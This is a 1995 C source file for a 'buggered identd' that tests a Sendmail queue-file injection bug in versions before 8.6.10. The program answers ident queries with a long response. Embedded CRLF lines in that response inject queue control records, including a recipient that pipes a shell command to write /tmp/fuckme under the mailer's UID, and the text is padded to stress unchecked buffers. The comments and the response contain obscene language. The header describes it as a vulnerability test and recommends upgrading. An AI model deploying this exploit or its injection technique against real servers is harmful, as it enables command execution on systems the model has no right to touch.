/* This is a "buggered identd" that tests the queue-file bug in Sendmails
   earlier than 8.6.10 and possibly some versions of 5.x.  It responds with
   embedded lines that, if the receiving Sendmail is buggy, get added to the
   queue file as control information or strange extra headers.

   This attempts to deliver mail to the file /tmp/fuckme, which will most
   likely be owned by bin or daemon or whatever UID your mailer runs as.
   If this file shows up, you have the bug.

   You should upgrade to sendmail 8.6.11, which is out now.

   This source is essentially unchanged from the original, and contains a
   fair amount of obscenity in the response, which you are free to remove.

   Avian Research, *Hobbit*, or any Internet provider bears NO responsibility
   for content or misuse of this program or any derivatives thereof.  This
   is designed solely as a testing service, not a cracking tool.

   Dedicated to:
	Mike Scheidell @ fdma.com
	Tom Jennings @ tlg.net

   _H*  950309 */

/* Derived from "generic responder" code. */

#include <stdio.h>
#include <syslog.h>

main () {

  char buf[80];
  char *p;
  fgets (buf, 77, stdin);

  buf[79] = '\0';
  p = buf + strlen(buf) - 1;
  if (*p == '\r' || *p == '\n')
    *p = '\0';
  p--;
  if (*p == '\r' || *p == '\n')
    *p = '\0';

/* formatted this weird way so it's easier to convert regular text into
   a compatible form, i.e. take your little file and tack "\r\n\" on the
   end of each line. */

  printf ("\
%s : USERID : UNIX : This_is_fucking_GOD,okay?...get_over_it.  Actually, \
this is a test of the emergency buffer bogosity system.  Does your mailer \
believe that the following...\
\r\nCroot\r\nR<\"|/bin/echo HAHA > /tmp/fuckme\">\r\nHReceived: are \
genuine headers?  Why didn't anyone think about these things TEN YEARS AGO?! \
If this were a real \
IDENTD, you would see a much shorter line pop out, and your daemon would \
stand a much better chance of NOT crashing.  Thank you so much for NOT \
bounds-checking your input, allowing dangerous user-settable options, doing \
sprintf()s to non-length-checked buffers with raw stuff you get from the net, \
indexing off signed integers ... you get the HINT YET??  Is this enough \
text for your poor little server to handle??!?  Are we \
up to at least 512 characters yet? ... Have a fucking LOVELY day, \
really.\r\n\
", buf);

  syslog (LOG_AUTH | LOG_INFO, "query!");
  fflush (stdout);
  sleep (1);		/* so the net finishes flushing */
  exit (0);
}